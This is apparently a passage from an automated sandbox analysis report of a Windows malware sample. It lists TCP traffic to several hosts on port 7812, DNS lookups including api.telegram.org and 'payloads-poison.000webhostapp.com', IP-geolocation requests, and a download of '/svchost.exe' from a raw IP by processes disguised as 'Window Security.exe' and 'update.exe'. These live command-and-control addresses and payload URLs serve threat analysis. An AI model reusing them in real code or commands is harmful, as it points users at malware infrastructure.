                                                  Sep 3, 2024 06:17:20.148835897 CEST497417812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:20.149260044 CEST497417812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:20.154331923 CEST781249741146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:23.877662897 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:23.882595062 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:23.971385002 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:23.976236105 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:24.424385071 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:24.430147886 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:25.626701117 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:25.631614923 CEST781249754146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:25.634984016 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:30.174945116 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:30.180202007 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:31.086700916 CEST78124974664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:31.086818933 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:33.206963062 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:33.212573051 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:33.666819096 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:33.666892052 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:33.992990017 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:33.994899035 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:33.997886896 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:33.999735117 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:33.999814034 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:34.105920076 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.106678963 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.110698938 CEST78124974664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:34.111469030 CEST78124975864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:34.111562967 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.112857103 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.116847992 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:34.117661953 CEST78124975864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:34.121759892 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:35.408801079 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:35.413625956 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:43.978972912 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:17:43.984236002 CEST8049707208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:17:46.643142939 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:46.647960901 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:46.973598003 CEST781249754146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:46.973654985 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:46.974132061 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:46.978960037 CEST781249754146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:46.987270117 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:46.992202997 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:47.176332951 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:47.181957960 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:48.130969048 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:48.135807037 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:50.755445004 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:50.760349989 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:52.550399065 CEST497637812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:52.555350065 CEST781249763146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:52.555413961 CEST497637812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:55.354190111 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:55.354240894 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:55.473505974 CEST78124975864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:55.473576069 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:58.488210917 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:58.488213062 CEST497667812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:58.493065119 CEST78124975864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:58.493077993 CEST78124976664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:58.493196011 CEST497667812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:58.493638992 CEST497667812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:58.498373032 CEST78124976664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:58.752449036 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:58.754744053 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:58.757262945 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:58.759610891 CEST781249767165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:58.759685040 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:58.792676926 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:58.797491074 CEST781249767165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:18:00.689907074 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:18:00.694735050 CEST781249767165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:18:08.835028887 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:18:08.839931011 CEST781249767165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:18:13.927268982 CEST781249763146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:13.927386045 CEST497637812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:13.930228949 CEST497637812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:13.935031891 CEST781249763146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:19.372195005 CEST497747812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:19.377396107 CEST781249774146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:19.381201029 CEST497747812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:19.850946903 CEST78124976664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:19.854650974 CEST497667812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:20.114748955 CEST781249767165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:18:20.117084026 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:18:22.815116882 CEST497677812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:18:22.817682028 CEST497767812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:22.820002079 CEST781249767165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:18:22.822527885 CEST781249776146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:22.822597980 CEST497767812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:22.860966921 CEST497767812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:22.865775108 CEST781249776146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:22.880091906 CEST497667812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:22.880650043 CEST497787812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:18:22.884955883 CEST78124976664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:22.885423899 CEST781249778185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:18:22.885481119 CEST497787812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:18:22.885941029 CEST497787812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:18:22.890688896 CEST781249778185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:18:24.495863914 CEST781249778185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:18:24.496124029 CEST497787812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:18:27.504306078 CEST497787812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:18:27.504642010 CEST497797812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:27.509073973 CEST781249778185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:18:27.509391069 CEST78124977964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:27.509459972 CEST497797812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:27.509747982 CEST497797812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:27.514488935 CEST78124977964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:37.315253019 CEST497767812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:37.320280075 CEST781249776146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:40.867142916 CEST781249774146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:40.867202997 CEST497747812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:40.867682934 CEST497747812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:40.872486115 CEST781249774146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:44.183444023 CEST781249776146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:44.183670998 CEST497767812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:45.867068052 CEST497867812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:45.872013092 CEST781249786146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:45.873377085 CEST497867812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:47.362359047 CEST497767812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:47.364968061 CEST497877812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:47.367451906 CEST781249776146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:47.369879007 CEST781249787146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:47.369950056 CEST497877812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:47.401701927 CEST497877812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:18:47.406537056 CEST781249787146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:18:48.866769075 CEST78124977964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:48.866837025 CEST497797812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:51.879762888 CEST497797812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:51.880214930 CEST497907812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:51.884602070 CEST78124977964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:51.885019064 CEST78124979064.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:18:51.885108948 CEST497907812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:51.885489941 CEST497907812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:18:51.890255928 CEST78124979064.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:00.002456903 CEST497877812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:00.007390976 CEST781249787146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:07.261976004 CEST781249786146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:07.262046099 CEST497867812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:07.262370110 CEST497867812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:07.267173052 CEST781249786146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:08.760066986 CEST781249787146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:08.761318922 CEST497877812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:08.762584925 CEST497957812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:19:08.762584925 CEST497877812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:08.767460108 CEST781249795165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:19:08.767508984 CEST781249787146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:08.767685890 CEST497957812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:19:08.789238930 CEST497957812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:19:08.794282913 CEST781249795165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:19:12.651720047 CEST497967812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:12.656718969 CEST781249796146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:12.656790972 CEST497967812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:13.253923893 CEST78124979064.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:13.254100084 CEST497907812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:16.282469988 CEST497907812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:16.282964945 CEST497997812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:16.287377119 CEST78124979064.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:16.287743092 CEST78124979964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:16.287803888 CEST497997812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:16.288110018 CEST497997812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:16.292860031 CEST78124979964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:23.629307032 CEST497957812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:19:23.634313107 CEST781249795165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:19:30.152757883 CEST781249795165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:19:30.153265953 CEST497957812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:19:32.155757904 CEST497957812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:19:32.157645941 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:32.160620928 CEST781249795165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:19:32.162431955 CEST781249804146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:32.165186882 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:32.199407101 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:32.204385042 CEST781249804146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:34.022505999 CEST781249796146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:34.022603989 CEST497967812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:34.022943020 CEST497967812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:34.027755022 CEST781249796146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:37.651176929 CEST78124979964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:37.651249886 CEST497997812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:39.408868074 CEST498077812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:39.413769960 CEST781249807146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:39.415201902 CEST498077812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:40.664395094 CEST497997812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:40.664674997 CEST498087812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:40.669130087 CEST78124979964.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:40.669410944 CEST78124980864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:40.669488907 CEST498087812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:40.669800043 CEST498087812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:19:40.674552917 CEST78124980864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:19:43.440099955 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:43.444988012 CEST781249804146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:49.659141064 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:49.664518118 CEST781249804146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:53.529119968 CEST781249804146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:53.529196024 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:54.663985968 CEST498047812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:19:54.670228004 CEST498137812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:19:54.866576910 CEST781249804146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:19:54.866595030 CEST781249813167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:19:54.866688013 CEST498137812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:19:54.951493979 CEST498137812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:19:54.956338882 CEST781249813167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:20:00.792156935 CEST781249807146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:20:00.792234898 CEST498077812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:20:02.043994904 CEST78124980864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:20:02.045233011 CEST498087812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:20:09.144547939 CEST498077812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:20:09.149671078 CEST781249807146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:20:10.314866066 CEST498137812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:20:10.319773912 CEST781249813167.99.94.206192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 3, 2024 06:15:57.782038927 CEST5175253192.168.2.51.1.1.1
                                                  Sep 3, 2024 06:15:57.788871050 CEST53517521.1.1.1192.168.2.5
                                                  Sep 3, 2024 06:15:57.944814920 CEST5485453192.168.2.51.1.1.1
                                                  Sep 3, 2024 06:15:57.951626062 CEST53548541.1.1.1192.168.2.5
                                                  Sep 3, 2024 06:16:34.481887102 CEST5592253192.168.2.51.1.1.1
                                                  Sep 3, 2024 06:16:34.515762091 CEST53559221.1.1.1192.168.2.5
                                                  Sep 3, 2024 06:16:38.322066069 CEST6086353192.168.2.51.1.1.1
                                                  Sep 3, 2024 06:16:38.330868959 CEST53608631.1.1.1192.168.2.5
                                                  Sep 3, 2024 06:16:38.379817009 CEST5847553192.168.2.51.1.1.1
                                                  Sep 3, 2024 06:16:38.386482954 CEST53584751.1.1.1192.168.2.5
                                                  Sep 3, 2024 06:16:38.910878897 CEST6016953192.168.2.51.1.1.1
                                                  Sep 3, 2024 06:16:38.935110092 CEST53601691.1.1.1192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Sep 3, 2024 06:15:57.782038927 CEST192.168.2.51.1.1.10xfd3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:15:57.944814920 CEST192.168.2.51.1.1.10x85c3Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:34.481887102 CEST192.168.2.51.1.1.10xf119Standard query (0)payloads-poison.000webhostapp.comA (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.322066069 CEST192.168.2.51.1.1.10x7756Standard query (0)201.75.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.379817009 CEST192.168.2.51.1.1.10xfe36Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.910878897 CEST192.168.2.51.1.1.10x641dStandard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Sep 3, 2024 06:15:57.788871050 CEST1.1.1.1192.168.2.50xfd3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:15:57.951626062 CEST1.1.1.1192.168.2.50x85c3No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:34.515762091 CEST1.1.1.1192.168.2.50xf119No error (0)payloads-poison.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                                                  Sep 3, 2024 06:16:34.515762091 CEST1.1.1.1192.168.2.50xf119No error (0)us-east-1.route-1.000webhost.awex.io145.14.144.231A (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.330868959 CEST1.1.1.1192.168.2.50x7756Name error (3)201.75.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.386482954 CEST1.1.1.1192.168.2.50xfe36No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.386482954 CEST1.1.1.1192.168.2.50xfe36No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.935110092 CEST1.1.1.1192.168.2.50x641dNo error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                  Sep 3, 2024 06:16:38.935110092 CEST1.1.1.1192.168.2.50x641dNo error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • api.telegram.org
                                                  • payloads-poison.000webhostapp.com
                                                  • api.mylnikov.org
                                                  • ip-api.com
                                                  • 91.134.207.16
                                                  • icanhazip.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549706208.95.112.1802680C:\Users\user\AppData\Roaming\Window Security.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 3, 2024 06:15:57.960913897 CEST144OUTGET /json/ HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Sep 3, 2024 06:15:58.406819105 CEST482INHTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:15:58 GMT
                                                  Content-Type: application/json; charset=utf-8
                                                  Content-Length: 305
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.549707208.95.112.1805352C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 3, 2024 06:16:03.519687891 CEST144OUTGET /json/ HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Sep 3, 2024 06:16:03.967185974 CEST482INHTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:03 GMT
                                                  Content-Type: application/json; charset=utf-8
                                                  Content-Length: 305
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 54
                                                  X-Rl: 43
                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.54972291.134.207.16802680C:\Users\user\AppData\Roaming\Window Security.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 3, 2024 06:16:35.411418915 CEST74OUTGET /svchost.exe HTTP/1.1
                                                  Host: 91.134.207.16
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.549723104.16.185.241801632C:\Users\user\AppData\Roaming\update.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 3, 2024 06:16:38.412154913 CEST63OUTGET / HTTP/1.1
                                                  Host: icanhazip.com
                                                  Connection: Keep-Alive
                                                  Sep 3, 2024 06:16:38.851185083 CEST534INHTTP/1.1 200 OK
                                                  Date: Tue, 03 Sep 2024 04:16:38 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 12
                                                  Connection: keep-alive
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET
                                                  Set-Cookie: __cf_bm=pN4VYA6YPabcOzUXO72BTEWWjnOJtEhcrN.Ya8_iJ1E-1725336998-1.0.1.1-eOapmP4uZ4ta83gObHuFv68xLSciDl2s5ABdxhY_QgZd84V1_CzDpc_G3GYBw7.dwmtRbg8SkS4dc4QDJEsdhg; path=/; expires=Tue, 03-Sep-24 04:46:38 GMT; domain=.icanhazip.com; HttpOnly
                                                  Server: cloudflare
                                                  CF-RAY: 8bd2ecf28d81c413-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                  Data Ascii: 8.46.123.33


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
